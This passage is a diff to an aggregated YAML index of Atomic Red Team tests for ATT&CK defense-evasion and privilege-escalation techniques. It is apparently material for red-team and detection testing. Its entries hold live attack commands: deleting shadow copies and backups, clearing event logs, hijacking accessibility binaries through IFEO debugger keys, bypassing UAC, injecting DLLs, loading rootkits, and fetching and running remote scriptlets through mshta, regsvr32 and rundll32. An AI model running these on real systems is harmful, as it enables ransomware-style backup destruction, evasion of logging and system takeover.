del /f %TEMP%\victim-files-cmd\a
command: 'del /f %TEMP%\victim-files-cmd\a
'
- name: Delete an entire folder - cmd
description: |
Recursively delete the temporary directory and all files contained within it using cmd.exe
description: 'Recursively delete the temporary directory and all files contained
within it using cmd.exe
'
supported_platforms:
- windows
executor:
name: command_prompt
command: |
del /f /S %TEMP%\victim-files-cmd
command: 'del /f /S %TEMP%\victim-files-cmd
'
- name: Delete a single file - ps
description: |
Delete a single file from the temporary directory using Powershell
description: 'Delete a single file from the temporary directory using Powershell
'
supported_platforms:
- windows
executor:
name: powershell
command: |
Remove-Item -path %TEMP%\victim-files-ps\a
command: 'Remove-Item -path %TEMP%\victim-files-ps\a
'
- name: Delete an entire folder - ps
description: |
Recursively delete the temporary directory and all files contained within it using Powershell
description: 'Recursively delete the temporary directory and all files contained
within it using Powershell
'
supported_platforms:
- windows
executor:
name: powershell
command: |
Remove-Item -path %TEMP%\victim-files-ps -recurse
command: 'Remove-Item -path %TEMP%\victim-files-ps -recurse
'
- name: Delete VSS - vssadmin
description: |
Delete all volume shadow copies with vssadmin.exe
description: 'Delete all volume shadow copies with vssadmin.exe
'
supported_platforms:
- windows
executor:
name: command_prompt
command: |
vssadmin.exe Delete Shadows /All /Quiet
command: 'vssadmin.exe Delete Shadows /All /Quiet
'
- name: Delete VSS - wmic
description: |
Delete all volume shadow copies with wmic
description: 'Delete all volume shadow copies with wmic
'
supported_platforms:
- windows
executor:
name: command_prompt
command: |
wmic shadowcopy delete
command: 'wmic shadowcopy delete
'
- name: bcdedit
description: |
xxx
description: 'xxx
'
supported_platforms:
- windows
executor:
@@ -4540,14 +4722,16 @@ defense-evasion:
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
- name: wbadmin
description: |
xxx
description: 'xxx
'
supported_platforms:
- windows
executor:
name: command_prompt
command: |
wbdadmin delete catalog -quiet
command: 'wbdadmin delete catalog -quiet
'
T1144:
technique:
name: Gatekeeper Bypass
@@ -4617,8 +4801,9 @@ defense-evasion:
identifier: T1144
atomic_tests:
- name: Gatekeeper Bypass
description: |
Gatekeeper Bypass via command line
description: 'Gatekeeper Bypass via command line
'
supported_platforms:
- macos
input_arguments:
@@ -4676,8 +4861,9 @@ defense-evasion:
identifier: T1148
atomic_tests:
- name: Disable history collection
description: |
Disables history collection in shells
description: 'Disables history collection in shells
'
supported_platforms:
- linux
- macos
@@ -4692,8 +4878,9 @@ defense-evasion:
export HISTCONTROL=ignoreboth
ls #{evil_command}
- name: Mac HISTCONTROL
description: |
xxx
description: 'xxx
'
supported_platforms:
- macos
- linux
@@ -4784,8 +4971,9 @@ defense-evasion:
identifier: T1158
atomic_tests:
- name: Create a hidden file in a hidden directory
description: |
Creates a hidden file inside a hidden directory
description: 'Creates a hidden file inside a hidden directory
'
supported_platforms:
- linux
- macos
@@ -4795,17 +4983,21 @@ defense-evasion:
mkdir .hidden-directory
echo "this file is hidden" > .hidden-directory/.hidden-file
- name: Mac Hidden file
description: |
TODO
description: 'TODO
'
supported_platforms:
- macos
executor:
name: sh
command: |
sudo xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00 40 00 FF FF FF FF 00 00"
command: 'sudo xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00
00 00 40 00 FF FF FF FF 00 00"
'
- name: Hidden file
description: |
mv file to a .file
description: 'mv file to a .file
'
supported_platforms:
- macos
- linux
@@ -4820,38 +5012,46 @@ defense-evasion:
default: "/tmp/evil"
executor:
name: sh
command: |
mv #(unknown) .#{output_filename}
command: 'mv #(unknown) .#{output_filename}
'
- name: Hidden files
description: |
Requieres Apple Dev Tools
description: 'Requieres Apple Dev Tools
'
supported_platforms:
- macos
executor:
name: sh
command: |
setfile -a V #(unknown)
command: 'setfile -a V #(unknown)
'
- name: Hide a Directory
description: |
xxx
description: 'xxx
'
supported_platforms:
- macos
executor:
name: sh
command: |
chflags hidden #(unknown)
command: 'chflags hidden #(unknown)
'
- name: Show all hidden files
description: |
xxx
description: 'xxx
'
supported_platforms:
- macos
executor:
name: sh
command: |
defaults write com.apple.finder AppleShowAllFiles YES
command: 'defaults write com.apple.finder AppleShowAllFiles YES
'
- name: Create visible Directories
description: |
xxx
description: 'xxx
'
supported_platforms:
- macos
- linux
@@ -4863,8 +5063,9 @@ defense-evasion:
ls
ls visible-directory
- name: Create hidden directories and files
description: |
xxx
description: 'xxx
'
supported_platforms:
- macos
- linux
@@ -4876,8 +5077,10 @@ defense-evasion:
ls -la
ls -la .hidden-directory
- name: Create ADS command prompt
description: |
Create an Alternate Data Stream with the command prompt. Write access is required.
description: 'Create an Alternate Data Stream with the command prompt. Write
access is required.
'
supported_platforms:
- windows
input_arguments:
@@ -4896,8 +5099,10 @@ defense-evasion:
echo "test" > :#{ads_filename}
dir /s /r | find ":$DATA"
- name: Create ADS PowerShell
description: |
Create an Alternate Data Stream with PowerShell. Write access is required.
description: 'Create an Alternate Data Stream with PowerShell. Write access
is required.
'
supported_platforms:
- windows
input_arguments:
@@ -4958,8 +5163,9 @@ defense-evasion:
identifier: T1147
atomic_tests:
- name: Hidden Users
description: |
Add a hidden user on MacOS
description: 'Add a hidden user on MacOS
'
supported_platforms:
- macos
input_arguments:
@@ -4969,8 +5175,9 @@ defense-evasion:
default: APT
executor:
name: sh
command: |
sudo dscl . -create /Users/#{user_name} UniqueID 333
command: 'sudo dscl . -create /Users/#{user_name} UniqueID 333
'
T1183:
technique:
name: Image File Execution Options Injection
@@ -5043,8 +5250,9 @@ defense-evasion:
identifier: T1183
atomic_tests:
- name: IFEO Add Debugger
description: |
TODO
description: 'TODO
'
supported_platforms:
- windows
input_arguments:
@@ -5058,11 +5266,14 @@ defense-evasion:
default: cmd.exe
executor:
name: command_prompt
command: |
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
'
- name: IFEO GLobal Flags
description: |
Leverage Global Flags Settings
description: 'Leverage Global Flags Settings
'
supported_platforms:
- windows
input_arguments:
@@ -5076,8 +5287,14 @@ defense-evasion:
default: cmd.exe
executor:
name: command_prompt
command: |
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v GlobalFlag /t REG_DWORD /d 512 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v ReportingMode /t REG_DWORD /d 1 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess /d "#{payload_binary}"
command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_binary}" /v GlobalFlag /t REG_DWORD /d 512
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}"
/v ReportingMode /t REG_DWORD /d 1 REG ADD "HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess
/d "#{payload_binary}"
'
T1070:
technique:
name: Indicator Removal on Host
@@ -5120,8 +5337,9 @@ defense-evasion:
identifier: T1070
atomic_tests:
- name: Clear Logs
description: |
Clear Windows Event Logs
description: 'Clear Windows Event Logs
'
supported_platforms:
- windows
input_arguments:
@@ -5131,20 +5349,25 @@ defense-evasion:
default: System
executor:
name: command_prompt
command: |
wevtutil cl #{log_name}
command: 'wevtutil cl #{log_name}
'
- name: FSUtil
description: |
Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume.
description: 'Manages the update sequence number (USN) change journal, which
provides a persistent log of all changes made to files on the volume.
'
supported_platforms:
- windows
executor:
name: command_prompt
command: |
fsutil usn deletejournal /D C:
command: 'fsutil usn deletejournal /D C:
'
- name: rm -rf
description: |
Delete system and audit logs
description: 'Delete system and audit logs
'
supported_platforms:
- macos
- linux
@@ -5356,8 +5579,9 @@ defense-evasion:
identifier: T1130
atomic_tests:
- name: Install root CA on CentOS/RHEL
description: |
Creates a root CA with openssl
description: 'Creates a root CA with openssl
'
supported_platforms:
- linux
input_arguments:
@@ -5443,8 +5667,9 @@ defense-evasion:
identifier: T1118
atomic_tests:
- name: InstallUtil uninstall method call
description: |
Executes the Uninstall Method
description: 'Executes the Uninstall Method
'
supported_platforms:
- windows
input_arguments:
@@ -5518,14 +5743,16 @@ defense-evasion:
identifier: T1152
atomic_tests:
- name: Launchctl
description: |
Utilize launchctl
description: 'Utilize launchctl
'
supported_platforms:
- macos
executor:
name: sh
command: |
launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator
command: 'launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator
'
T1036:
technique:
name: Masquerading
@@ -5607,8 +5834,10 @@ defense-evasion:
identifier: T1036
atomic_tests:
- name: Masquerading as Windows LSASS process
description: |
Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsass.exe.
description: 'Copies cmd.exe, renames it, and launches it to masquerade as an
instance of lsass.exe.
'
supported_platforms:
- windows
executor:
@@ -5617,8 +5846,10 @@ defense-evasion:
cmd.exe /c copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe
cmd.exe /c %SystemRoot%\Temp\lsass.exe
- name: Masquerading as Linux crond process.
description: |
Copies sh process, renames it as crond, and executes it to masquerade as the cron daemon.
description: 'Copies sh process, renames it as crond, and executes it to masquerade
as the cron daemon.
'
supported_platforms:
- linux
executor:
@@ -5689,14 +5920,18 @@ defense-evasion:
identifier: T1112
atomic_tests:
- name: Modify Registry of Current User Profile - cmd
description: |
Modify the registry of the currently logged in user using reg.exe cia cmd console
description: 'Modify the registry of the currently logged in user using reg.exe
cia cmd console
'
supported_platforms:
- windows
executor:
name: command_prompt
command: |
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f
command: 'reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
/t REG_DWORD /v HideFileExt /d 1 /f
'
- name: Modify Registry of Local Machine - cmd
description: |
Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup. This should only be possible when
@@ -5705,11 +5940,15 @@ defense-evasion:
- windows
executor:
name: command_prompt
command: |
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d {some_other_executable} /f
command: 'reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
/t REG_EXPAND_SZ /v SecurityHealth /d {some_other_executable} /f
'
- name: Modify Registry of Another User Profile
description: |
Modify a registry key of each user profile not currently loaded on the machine using both powershell and cmd line tools.
description: 'Modify a registry key of each user profile not currently loaded
on the machine using both powershell and cmd line tools.
'
supported_platforms:
- windows
executor:
@@ -5837,8 +6076,9 @@ defense-evasion:
identifier: T1170
atomic_tests:
- name: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject
description: |
Test execution of a remote script using mshta.exe
description: 'Test execution of a remote script using mshta.exe
'
supported_platforms:
- windows
input_arguments:
@@ -5848,8 +6088,9 @@ defense-evasion:
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/mshta.sct
executor:
name: command_prompt
command: |
mshta.exe javascript:a=(GetObject('script:#{file_url}')).Exec();close();
command: 'mshta.exe javascript:a=(GetObject(''script:#{file_url}'')).Exec();close();
'
T1096:
technique:
name: NTFS File Attributes
@@ -6012,8 +6253,9 @@ defense-evasion:
identifier: T1126
atomic_tests:
- name: Add Network Share
description: |
Add a Network Share utilizing the command_prompt
description: 'Add a Network Share utilizing the command_prompt
'
supported_platforms:
- windows
input_arguments:
@@ -6027,8 +6269,9 @@ defense-evasion:
net use c: #{share_name}
net share test=#{share_name} /REMARK:"test share" /CACHE:No
- name: Remove Network Share
description: |
Removes a Network Share utilizing the command_prompt
description: 'Removes a Network Share utilizing the command_prompt
'
supported_platforms:
- windows
input_arguments:
@@ -6038,11 +6281,13 @@ defense-evasion:
default: "\\\\test\\share"
executor:
name: command_prompt
command: |
net share #{share_name} /delete
command: 'net share #{share_name} /delete
'
- name: Remove Network Share PowerShell
description: |
Removes a Network Share utilizing PowerShell
description: 'Removes a Network Share utilizing PowerShell
'
supported_platforms:
- windows
input_arguments:
@@ -6169,8 +6414,10 @@ defense-evasion:
identifier: T1027
atomic_tests:
- name: Decode base64 Data into Script
description: |
Creates a base64-encoded data file and decodes it into an executable shell script
description: 'Creates a base64-encoded data file and decodes it into an executable
shell script
'
supported_platforms:
- macos
- linux
@@ -6244,8 +6491,9 @@ defense-evasion:
identifier: T1150
atomic_tests:
- name: Plist Modification
description: |
TODO
description: 'TODO
'
supported_platforms:
- macos
executor:
@@ -6414,8 +6662,9 @@ defense-evasion:
identifier: T1055
atomic_tests:
- name: Process Injection via mavinject.exe
description: |
Windows 10 Utility To Inject DLLS
description: 'Windows 10 Utility To Inject DLLS
'
supported_platforms:
- windows
input_arguments:
@@ -6429,11 +6678,13 @@ defense-evasion:
default: "$pid"
executor:
name: powershell
command: |
mavinject $pid /INJECTRUNNING #{dll_payload}
command: 'mavinject $pid /INJECTRUNNING #{dll_payload}
'
- name: Process Injection via PowerSploit
description: |
PowerShell Injection using [PowerSploit Invoke-DLLInjection](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-DllInjection.ps1)
description: 'PowerShell Injection using [PowerSploit Invoke-DLLInjection](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-DllInjection.ps1)
'
supported_platforms:
- windows
input_arguments:
@@ -6447,8 +6698,9 @@ defense-evasion:
default: "$pid"
executor:
name: powershell
command: |
Invoke-DllInjection.ps1 -ProcessID #{process_id} -Dll #{dll_payload}
command: 'Invoke-DllInjection.ps1 -ProcessID #{process_id} -Dll #{dll_payload}
'
T1121:
technique:
name: Regsvcs/Regasm
@@ -6514,8 +6766,9 @@ defense-evasion:
identifier: T1121
atomic_tests:
- name: Regasm Uninstall Method Call Test
description: |
Executes the Uninstall Method, No Admin Rights Required
description: 'Executes the Uninstall Method, No Admin Rights Required
'
supported_platforms:
- windows
input_arguments:
@@ -6534,8 +6787,10 @@ defense-evasion:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{file_name}
del #{file_name}
- name: Regsvs Uninstall Method Call Test
description: |
Executes the Uninstall Method, No Admin Rights Required, Requires SNK
description: 'Executes the Uninstall Method, No Admin Rights Required, Requires
SNK
'
supported_platforms:
- windows
input_arguments:
@@ -6635,8 +6890,10 @@ defense-evasion:
identifier: T1117
atomic_tests:
- name: Regsvr32 local COM scriptlet execution
description: |
Regsvr32.exe is a command-line program used to register and unregister OLE controls
description: 'Regsvr32.exe is a command-line program used to register and unregister
OLE controls
'
supported_platforms:
- windows
input_arguments:
@@ -6646,11 +6903,14 @@ defense-evasion:
default: C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct
executor:
name: command_prompt
command: |
regsvr32.exe /s /u /i:#(unknown) scrobj.dll
command: 'regsvr32.exe /s /u /i:#(unknown) scrobj.dll
'
- name: Regsvr32 remote COM scriptlet execution
description: |
Regsvr32.exe is a command-line program used to register and unregister OLE controls
description: 'Regsvr32.exe is a command-line program used to register and unregister
OLE controls
'
supported_platforms:
- windows
input_arguments:
@@ -6660,11 +6920,14 @@ defense-evasion:
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct
executor:
name: command_prompt
command: |
regsvr32.exe /s /u /i:#{url} scrobj.dll
command: 'regsvr32.exe /s /u /i:#{url} scrobj.dll
'
- name: Regsvr32 local DLL execution
description: |
Regsvr32.exe is a command-line program used to register and unregister OLE controls
description: 'Regsvr32.exe is a command-line program used to register and unregister
OLE controls
'
supported_platforms:
- windows
input_arguments:
@@ -6674,8 +6937,10 @@ defense-evasion:
default: C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll
executor:
name: command_prompt
command: |
"IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( regsvr32.exe /s #{dll_name} )"
command: '"IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe
/s #{dll_name}) ELSE ( regsvr32.exe /s #{dll_name} )"
'
T1014:
technique:
name: Rootkit
@@ -6745,8 +7010,9 @@ defense-evasion:
identifier: T1014
atomic_tests:
- name: Loadable Kernel Module based Rootkit
description: |
Loadable Kernel Module based Rootkit
description: 'Loadable Kernel Module based Rootkit
'
supported_platforms:
- linux
input_arguments:
@@ -6756,11 +7022,13 @@ defense-evasion:
default: Module.ko
executor:
name: sh
command: |
sudo insmod #{rootkit_file}
command: 'sudo insmod #{rootkit_file}
'
- name: Loadable Kernel Module based Rootkit
description: |
Loadable Kernel Module based Rootkit
description: 'Loadable Kernel Module based Rootkit
'
supported_platforms:
- linux
input_arguments:
@@ -6770,17 +7038,20 @@ defense-evasion:
default: Module.ko
executor:
name: sh
command: |
sudo modprobe #{rootkit_file}
command: 'sudo modprobe #{rootkit_file}
'
- name: LD_PRELOAD based Rootkit
description: |
LD_PRELOAD based Rootkit
description: 'LD_PRELOAD based Rootkit
'
supported_platforms:
- linux
executor:
name: sh
command: |
export LD_PRELOAD=$PWD/#{rootkit_file}
command: 'export LD_PRELOAD=$PWD/#{rootkit_file}
'
- name: Windows Signed Driver Rootkit Test
description: |
This test exploits a signed driver to execute code in Kernel.
@@ -6800,8 +7071,9 @@ defense-evasion:
default: C:\Drivers\driver.sys
executor:
name: command_prompt
command: |
puppetstrings #{driver_path}
command: 'puppetstrings #{driver_path}
'
T1085:
technique:
name: Rundll32
@@ -6868,8 +7140,9 @@ defense-evasion:
identifier: T1085
atomic_tests:
- name: Rundll32 execute JavaScript Remote Payload With GetObject
description: |
Test execution of a remote script using rundll32.exe
description: 'Test execution of a remote script using rundll32.exe
'
supported_platforms:
- windows
input_arguments:
@@ -6879,8 +7152,9 @@ defense-evasion:
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/T1085.sct
executor:
name: command_prompt
command: |
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();"
command: 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();"
'
T1064:
technique:
name: Scripting
@@ -6954,8 +7228,9 @@ defense-evasion:
identifier: T1064
atomic_tests:
- name: Create and Execute Bash Shell Script
description: |
Creates and executes a simple bash script.
description: 'Creates and executes a simple bash script.
'
supported_platforms:
- macos
- linux
@@ -7029,8 +7304,10 @@ defense-evasion:
identifier: T1216
atomic_tests:
- name: PubPrn.vbs Signed Script Bypass
description: |
Executes the signed PubPrn.vbs script with options to download and execute an arbitrary payload.
description: 'Executes the signed PubPrn.vbs script with options to download
and execute an arbitrary payload.
'
supported_platforms:
- windows
input_arguments:
@@ -7040,8 +7317,10 @@ defense-evasion:
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct
executor:
name: command_prompt
command: |
cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}"
command: 'cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
localhost "script:#{remote_payload}"
'
T1151:
technique:
name: Space after Filename
@@ -7098,8 +7377,9 @@ defense-evasion:
identifier: T1151
atomic_tests:
- name: Space After Filename
description: |
Space After Filename
description: 'Space After Filename
'
supported_platforms:
- macos
executor:
@@ -7156,8 +7436,9 @@ defense-evasion:
identifier: T1099
atomic_tests:
- name: Set a file's access timestamp
description: |
Stomps on the access timestamp of a file
description: 'Stomps on the access timestamp of a file
'
supported_platforms:
- linux
- macos
@@ -7167,11 +7448,13 @@ defense-evasion:
type: Path
executor:
name: sh
command: |
touch -a -t 197001010000.00 #{target_filename}
command: 'touch -a -t 197001010000.00 #{target_filename}
'
- name: Set a file's modification timestamp
description: |
Stomps on the modification timestamp of a file
description: 'Stomps on the modification timestamp of a file
'
supported_platforms:
- linux
- macos
@@ -7181,8 +7464,9 @@ defense-evasion:
type: Path
executor:
name: sh
command: |
touch -m -t 197001010000.00 #{target_filename}
command: 'touch -m -t 197001010000.00 #{target_filename}
'
- name: Set a file's creation timestamp
description: |
Stomps on the create timestamp of a file
@@ -7348,8 +7632,9 @@ defense-evasion:
identifier: T1127
atomic_tests:
- name: MSBuild Bypass Using Inline Tasks
description: |
Executes the code in a project file using. C# Example
description: 'Executes the code in a project file using. C# Example
'
supported_platforms:
- windows
input_arguments:
@@ -7359,11 +7644,15 @@ defense-evasion:
default: T1127.csproj
executor:
name: command_prompt
command: |
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #(unknown)
command: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #(unknown)
'
- name: MSXSL Bypass using local files
description: |
Executes the code specified within a XSL script tag during XSL transformation using a local payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
description: 'Executes the code specified within a XSL script tag during XSL
transformation using a local payload. Requires download of MSXSL from Microsoft
at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
'
supported_platforms:
- windows
input_arguments:
@@ -7377,11 +7666,15 @@ defense-evasion:
default: C:\AtomicRedTeam\atomics\T1127\src\msxsl-script.xsl
executor:
name: command_prompt
command: |
C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
command: 'C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
'
- name: MSXSL Bypass using remote files
description: |
Executes the code specified within a XSL script tag during XSL transformation using a remote payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
description: 'Executes the code specified within a XSL script tag during XSL
transformation using a remote payload. Requires download of MSXSL from Microsoft
at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
'
supported_platforms:
- windows
input_arguments:
@@ -7395,8 +7688,9 @@ defense-evasion:
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1127/src/msxsl-script.xsl
executor:
name: command_prompt
command: |
C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
command: 'C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
'
privilege-escalation:
T1134:
technique:
@@ -7622,8 +7916,9 @@ privilege-escalation:
identifier: T1015
atomic_tests:
- name: Attaches Command Prompt As Debugger To Process - osk
description: |
This allows adversaries to execute the attached process
description: 'This allows adversaries to execute the attached process
'
supported_platforms:
- windows
input_arguments:
@@ -7633,11 +7928,15 @@ privilege-escalation:
default: osk.exe
executor:
name: command_prompt
command: |
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
'
- name: Attaches Command Prompt As Debugger To Process - sethc
description: |
This allows adversaries to execute the attached process
description: 'This allows adversaries to execute the attached process
'
supported_platforms:
- windows
input_arguments:
@@ -7647,11 +7946,15 @@ privilege-escalation:
default: sethc.exe
executor:
name: command_prompt
command: |
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
'
- name: Attaches Command Prompt As Debugger To Process - utilman
description: |
This allows adversaries to execute the attached process
description: 'This allows adversaries to execute the attached process
'
supported_platforms:
- windows
input_arguments:
@@ -7661,11 +7964,15 @@ privilege-escalation:
default: utilman.exe
executor:
name: command_prompt
command: |
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
'
- name: Attaches Command Prompt As Debugger To Process - magnify
description: |
This allows adversaries to execute the attached process
description: 'This allows adversaries to execute the attached process
'
supported_platforms:
- windows
input_arguments:
@@ -7675,11 +7982,15 @@ privilege-escalation:
default: magnify.exe
executor:
name: command_prompt
command: |
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
'
- name: Attaches Command Prompt As Debugger To Process - narrator
description: |
This allows adversaries to execute the attached process
description: 'This allows adversaries to execute the attached process
'
supported_platforms:
- windows
input_arguments:
@@ -7689,11 +8000,15 @@ privilege-escalation:
default: narrator.exe
executor:
name: command_prompt
command: |
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
'
- name: Attaches Command Prompt As Debugger To Process - DisplaySwitch
description: |
This allows adversaries to execute the attached process
description: 'This allows adversaries to execute the attached process
'
supported_platforms:
- windows
input_arguments:
@@ -7703,11 +8018,15 @@ privilege-escalation:
default: DisplaySwitch.exe
executor:
name: command_prompt
command: |
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
'
- name: Attaches Command Prompt As Debugger To Process - AtBroker
description: |
This allows adversaries to execute the attached process
description: 'This allows adversaries to execute the attached process
'
supported_platforms:
- windows
input_arguments:
@@ -7717,8 +8036,11 @@ privilege-escalation:
default: atbroker.exe
executor:
name: command_prompt
command: |
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
'
'':
technique:
name: Web Shell
@@ -7860,8 +8182,10 @@ privilege-escalation:
identifier: T1103
atomic_tests:
- name: Install AppInit Shim
description: |
AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded into each user mode process on the system
description: 'AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs
to be loaded into each user mode process on the system
'
supported_platforms:
- windows
input_arguments:
@@ -7871,8 +8195,9 @@ privilege-escalation:
default: T1103.reg
executor:
name: command_prompt
command: |
reg.exe import #{registry_file}
command: 'reg.exe import #{registry_file}
'
T1138:
technique:
name: Application Shimming
@@ -7942,14 +8267,16 @@ privilege-escalation:
identifier: T1138
atomic_tests:
- name: Application Shim Installation
description: |
This test injects a DLL into a custom application
description: 'This test injects a DLL into a custom application
'
supported_platforms:
- windows
executor:
name: command_prompt
command: |
sdbinst.exe AtomicShimx86.sdb
command: 'sdbinst.exe AtomicShimx86.sdb
'
T1088:
technique:
name: Bypass User Account Control
@@ -8059,8 +8386,10 @@ privilege-escalation:
identifier: T1088
atomic_tests:
- name: Bypass UAC using Event Viewer
description: |
Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
description: 'Bypasses User Account Control using Event Viewer and a relevant
Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
'
supported_platforms:
- windows
input_arguments:
@@ -8192,8 +8521,9 @@ privilege-escalation:
identifier: T1179
atomic_tests:
- name: Hook PowerShell TLS Encrypt/Decrypt Messages
description: |
Hooks functions in PowerShell to read TLS Communications
description: 'Hooks functions in PowerShell to read TLS Communications
'
supported_platforms:
- windows
input_arguments:
@@ -8282,8 +8612,9 @@ privilege-escalation:
identifier: T1183
atomic_tests:
- name: IFEO Add Debugger
description: |
TODO
description: 'TODO
'
supported_platforms:
- windows
input_arguments:
@@ -8297,11 +8628,14 @@ privilege-escalation:
default: cmd.exe
executor:
name: command_prompt
command: |
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
